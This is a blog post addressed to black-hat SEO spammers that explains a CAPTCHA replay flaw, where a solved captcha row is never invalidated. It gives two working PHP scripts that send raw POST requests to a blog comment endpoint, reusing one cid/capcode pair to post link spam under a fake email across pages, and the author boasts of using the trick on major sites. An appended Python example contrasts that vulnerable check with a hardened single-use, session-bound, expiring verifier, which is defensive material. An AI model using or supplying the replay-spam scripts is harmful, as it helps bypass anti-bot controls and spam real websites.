Defeating CAPTCHAs
This is my first post on this brand new website focusing on programming tricks.
This one is for all you black hat SEO people out there trying to beat CAPTCHAs with GOCR or your own code.
The first thing you have to realise is that beating CAPTCHAs with neural networks is possible, but it's very hard.
So if there's an easier way out, we'd all be happy to follow that route, right?
Let's think about how a captcha system works. You create a random string and use GD or ImageMagick to render that string into an image. To decide whether the code a visitor types matches the string in the image, the system has to remember the answer for every captcha it has generated.
We can assume that most captcha systems link the filename of the captcha image to the right answer in a database, like so:
Table: answers

Generated image | Answer
----------------+--------
captcha1.jpg    | DOF93fF
captcha2.jpg    | lf3FM9
Once a person or bot enters the text in the text field, the system checks whether the input matches the stored answer. If it does, you pass. After that the system SHOULD remove or deactivate the row, because the answer for that image has now been given and must not be accepted a second time.
This is where a lot of systems go wrong: they keep the row in the database and neither deactivate nor remove it. What are the consequences?
Let's say I want to post a comment on a blog like this one, with PHP:
<?php
// Posts one comment through a raw HTTP/1.1 request; the captcha fields
// (capcode, cid) are the ones captured from an earlier, honest submission.
function comment($domain, $rest) {
    $fp = fsockopen($domain, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        $postdata = "comment_ID=0&comment_level=&comment_post_ID=348&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
        $salida  = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
        $salida .= "Host: " . $domain . "\r\n";
        $salida .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
        $salida .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $salida .= "Content-Length: " . strlen($postdata) . "\r\n"; // without it the server never reads the body
        $salida .= "Referer: http://" . $domain . $rest . "\r\n";
        $salida .= "Connection: close\r\n\r\n";
        $salida .= $postdata;
        fwrite($fp, $salida);
        // read the full response so we can see whether the comment was accepted
        $d = '';
        while (!feof($fp)) {
            $d .= fgets($fp, 1024);
        }
        fclose($fp);
        echo $d;
    }
}
The headers I got by making a post through Firefox and capturing them with Live HTTP Headers.
As you can see, the captcha details are included in the POST parameters: cid and capcode.
The cid is most likely the row number in the database; this is how the system keeps track of which captcha was displayed. The capcode is the correct answer I entered, so this comment will succeed.
Since this is an example of a bad captcha system, it of course does not remove or deactivate the row in the database. That means I can make the system believe I was shown the same captcha again (while I obviously got a different one) and reuse the answer I gave earlier. I simply change all the other POST parameters but keep the same captcha parameters:
<?php
// Same request as before; only comment_post_ID changed. capcode=ZUTEoo and
// cid=413 are replayed unchanged, because the server never invalidated them.
function comment($domain, $rest) {
    $fp = fsockopen($domain, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        $postdata = "comment_ID=0&comment_level=&comment_post_ID=455&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
        $salida  = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
        $salida .= "Host: " . $domain . "\r\n";
        $salida .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
        $salida .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $salida .= "Content-Length: " . strlen($postdata) . "\r\n"; // without it the server never reads the body
        $salida .= "Referer: http://" . $domain . $rest . "\r\n";
        $salida .= "Connection: close\r\n\r\n";
        $salida .= $postdata;
        fwrite($fp, $salida);
        $d = '';
        while (!feof($fp)) {
            $d .= fgets($fp, 1024);
        }
        fclose($fp);
        echo $d;
    }
}
So I changed the comment_post_ID parameter, which means I posted a comment on another page/blog, but I kept using the same captcha answer. A lot of systems are vulnerable to this technique; I have been using this very same technique on Alexa top 50 websites and they are still vulnerable after all these months.
I hope all of this makes sense. If not, please leave a comment and I'll do my best to explain.
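To show both sides of this, the flawed check described above (the row is left in the database) and the replay of one solved cid/capcode pair against a second comment_post_ID, here is an added example in Python; it is not code from the original post and not the code of any particular blog system. It models the "answers" table in an in-memory SQLite database and puts the vulnerable verifier next to a hardened one that consumes the row in a single write transaction, binds it to the submitting session and expires it. The column names, the session binding and the five-minute lifetime are assumptions made for the example.

```python
"""Captcha replay: the flawed verifier from the post beside a hardened one.

Added example, not code from the original post. It models the post's
'answers' table in an in-memory SQLite database; the table layout, the
session binding and the 5-minute lifetime are assumptions for the example.
"""
import hmac
import secrets
import sqlite3
import string
import time
import urllib.parse

ALPHABET = string.ascii_letters + string.digits
TTL_SECONDS = 300  # assumed lifetime of an unanswered captcha


def make_store():
    """The 'answers' table: one row per generated captcha image."""
    # isolation_level=None: no implicit transactions, BEGIN IMMEDIATE below is ours
    db = sqlite3.connect(":memory:", isolation_level=None)
    db.execute("CREATE TABLE answers (cid INTEGER PRIMARY KEY, image TEXT,"
               " answer TEXT, session TEXT, created REAL)")
    return db


def new_captcha(db, session, now=None):
    """Generate the random string that GD/ImageMagick would render, store it
    against a fresh cid for this session, and return (cid, answer)."""
    answer = "".join(secrets.choice(ALPHABET) for _ in range(6))
    created = time.time() if now is None else now
    cur = db.execute("INSERT INTO answers (answer, session, created) VALUES (?, ?, ?)",
                     (answer, session, created))
    cid = cur.lastrowid
    db.execute("UPDATE answers SET image = ? WHERE cid = ?", (f"captcha{cid}.jpg", cid))
    return cid, answer


def check_vulnerable(db, cid, capcode, session=None, now=None):
    """The check the post describes: compare and leave the row in place.
    A correct (cid, capcode) pair stays valid forever, for anyone."""
    row = db.execute("SELECT answer FROM answers WHERE cid = ?", (cid,)).fetchone()
    return row is not None and row[0] == capcode


def check_hardened(db, cid, capcode, session, now=None):
    """Single-use, session-bound, expiring check. The row is deleted inside
    one write transaction whether or not the answer is right, so each image
    allows exactly one guess and two concurrent replays cannot both win."""
    now = time.time() if now is None else now
    db.execute("BEGIN IMMEDIATE")
    try:
        row = db.execute("SELECT answer, session, created FROM answers WHERE cid = ?",
                         (cid,)).fetchone()
        db.execute("DELETE FROM answers WHERE cid = ?", (cid,))
        db.execute("COMMIT")
    except Exception:
        db.execute("ROLLBACK")
        raise
    if row is None:
        return False
    answer, owner, created = row
    return (owner == session
            and created > now - TTL_SECONDS
            and hmac.compare_digest(answer.encode(), capcode.encode()))


def post_comment(db, check, session, postdata):
    """What comment_post.php has to do: pull cid/capcode out of the form body
    and accept the comment only if the captcha check passes."""
    form = dict(urllib.parse.parse_qsl(postdata))
    return check(db, int(form["cid"]), form["capcode"], session)


def replay_demo(check):
    """Solve one captcha honestly, then resend the same cid/capcode with a
    different comment_post_ID, as in the post. Returns (first, replay)."""
    db = make_store()
    cid, answer = new_captcha(db, "sess-A")
    # constructed form bodies in the shape of the post's $postdata
    first = f"comment_post_ID=348&author=poster&comment=hi&capcode={answer}&cid={cid}"
    replay = f"comment_post_ID=455&author=poster&comment=hi&capcode={answer}&cid={cid}"
    return (post_comment(db, check, "sess-A", first),
            post_comment(db, check, "sess-A", replay))


if __name__ == "__main__":
    print("vulnerable:", replay_demo(check_vulnerable))  # (True, True)
    print("hardened:  ", replay_demo(check_hardened))    # (True, False)
```

The vulnerable verifier accepts the replayed body because nothing about the first success changed the table. The hardened one deletes the row before it even looks at the answer, so a wrong guess burns the image too (no brute-forcing one cid), a stolen cid/capcode from another visitor's session is refused, and an answer harvested today is useless after the TTL. Whatever language the real comment handler is written in, the verify and the invalidate must happen in the same atomic step; a SELECT followed by a separate DELETE leaves a window in which parallel submissions of the same cid all pass.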